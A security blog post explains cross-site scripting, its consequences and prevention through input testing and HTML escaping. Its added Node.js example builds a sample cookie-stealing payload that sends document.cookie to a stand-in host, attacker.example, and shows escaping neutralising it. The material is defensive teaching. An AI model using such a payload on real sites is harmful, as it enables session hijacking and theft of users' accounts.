Thursday, December 2, 2010

Part 2: Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is one of the most common application-layer web attacks. Unlike attacks aimed at the server, XSS targets the scripts that run in the victim's web browser: the attacker gets the application to deliver script of the attacker's choosing to another user, and that user's browser runs it with the trust it gives the legitimate site. A basic example is an attacker injecting a script into a link to a legitimate shopping site. When a victim follows the link, the injected script runs in the victim's browser; it can redirect the victim to a fake but identical-looking page, or simply read the cookie of the user browsing the shopping site and send it to the attacker, who can then hijack the legitimate user's session.
An on-line business cannot afford to lose the trust of its present and future customers, and the fact that nobody has yet stepped forward to prove that a site is vulnerable to XSS is no evidence that it is safe. Exploited XSS is commonly used to achieve the following malicious results:
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user's web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks
Security flaws in high-profile web sites have allowed attackers to obtain credit card details and user information and to perform transactions in the victims' names. The major cause of XSS is missing input validation and output encoding within the application. A lot of applications do not validate their input, and they do not check whether data a user enters can be executed as code when it is written back into a page.

Ways to Prevent Cross-Site Scripting Attacks
1.      Validate code: Go through your code and test it. Ask yourself, "If a person enters 'code' in the textbox, will the code execute?" The only way to find out is to try to run "code" within the textbox. For XSS the code to try is HTML and JavaScript (a <script> tag, an event-handler attribute such as onerror); SQL commands test for a different flaw, SQL injection, but the same approach applies.
2.      Escaping: Escaping replaces the characters that have special meaning in HTML, such as <, >, &, " and ', with their entity equivalents (&lt;, &gt;, &amp;, &quot;, &#x27;) before untrusted data is written into a page, so the browser renders them as literal text rather than interpreting them as markup or script. The escaping must match the context the data lands in (HTML text, an attribute value, a JavaScript string, a URL), because each context has its own special characters.
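The two steps above, worked through in code. This is an added example for this post, not code from the original article: a hypothetical "search results" page fragment is built from a user-supplied query, first unsafely and then with HTML escaping, and a crude developer-side check shows whether the cookie-stealing payload from the introduction would still execute. The function names, the attacker.example host and the payload are all constructed for the illustration. It runs under Node.js with no browser.

```javascript
// Added example (not from the original post). Hypothetical names throughout.

// Characters with meaning in HTML text and attribute contexts, and the entity
// each must become so the browser renders it as literal text. The forward
// slash is included so a closing tag such as </script> cannot be formed.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;',
};

// Step 2, "Escaping": replace every significant character before untrusted
// data is concatenated into HTML. This is correct for HTML text and quoted
// attribute values; JavaScript-string and URL contexts need their own encoders.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query is concatenated straight into the markup, so a query
// such as <script>...</script> becomes part of the page's own code.
function renderResultsUnsafe(query) {
  return `<p>You searched for: ${query}</p>`;
}

// Fixed: the same template, but the query is escaped first. The browser now
// displays the payload as text instead of executing it.
function renderResultsSafe(query) {
  return `<p>You searched for: ${escapeHtml(query)}</p>`;
}

// Step 1, "Validate code": a crude aid for the developer's own test of
// "if I enter code, does it execute?". It looks for a raw <script> tag or a
// raw tag carrying an inline event handler (onerror=, onload=, ...). It is a
// test helper for spotting unescaped output, not a production filter.
function containsActiveScript(html) {
  return /<script\b|<\w+[^>]*\bon\w+\s*=/i.test(html);
}

// Constructed payload modelled on the cookie-stealing example in the post:
// it sends document.cookie to an attacker-controlled host (hypothetical name).
const PAYLOAD =
  '<script>new Image().src="http://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Runs both renderings side by side: node xss_escape.js
function demo() {
  const unsafe = renderResultsUnsafe(PAYLOAD);
  const safe = renderResultsSafe(PAYLOAD);
  console.log('unsafe  :', unsafe);
  console.log('escaped :', safe);
  console.log('unsafe executes?  ', containsActiveScript(unsafe)); // true
  console.log('escaped executes? ', containsActiveScript(safe));   // false
  return { unsafe, safe };
}

demo();
```

The escaped rendering shows `&lt;script&gt;` where the unsafe one shows `<script>`; the payload reaches the page in both cases, but only in the first does the browser treat it as code. The check in `containsActiveScript` is deliberately simple and only demonstrates the testing step; the real defence is the escaping applied at every point where untrusted data is written into the page.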
For more information on Cross-Site Scripting and other web application security topics, see OWASP (owasp.org).